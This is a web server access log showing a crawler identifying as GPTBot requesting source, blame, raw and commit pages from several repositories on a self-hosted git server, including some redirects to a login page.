"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15340] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10195] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13702] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13698] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7637] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" -[17/Feb/2026:15:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:15:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" -[17/Feb/2026:15:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=source" [Client 74.7.227.38] [Length 12966] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" -[17/Feb/2026:15:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16090] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" -[17/Feb/2026:15:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" -[17/Feb/2026:15:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=source" [Client 74.7.227.38] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" -[17/Feb/2026:15:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" -[17/Feb/2026:15:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=source" [Client 74.7.227.38] [Length 11955] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" -[17/Feb/2026:15:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" -[17/Feb/2026:15:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" -[17/Feb/2026:15:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" -[17/Feb/2026:15:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 24886] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:15:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21544] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" -[17/Feb/2026:15:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 18044] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10839] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" -[17/Feb/2026:15:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14184] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:15:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" -[17/Feb/2026:15:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15191] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13439] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" -[17/Feb/2026:15:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" -[17/Feb/2026:15:36:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:15:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11319] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" -[17/Feb/2026:15:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" -[17/Feb/2026:15:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" -[17/Feb/2026:15:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=source" [Client 74.7.227.38] [Length 11754] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" -[17/Feb/2026:15:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" -[17/Feb/2026:15:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md?display=source" [Client 74.7.227.38] [Length 11759] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" -[17/Feb/2026:15:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:15:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:36:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Footer.tsx" -[17/Feb/2026:15:36:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/About.tsx" -[17/Feb/2026:15:36:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Header.tsx" -[17/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 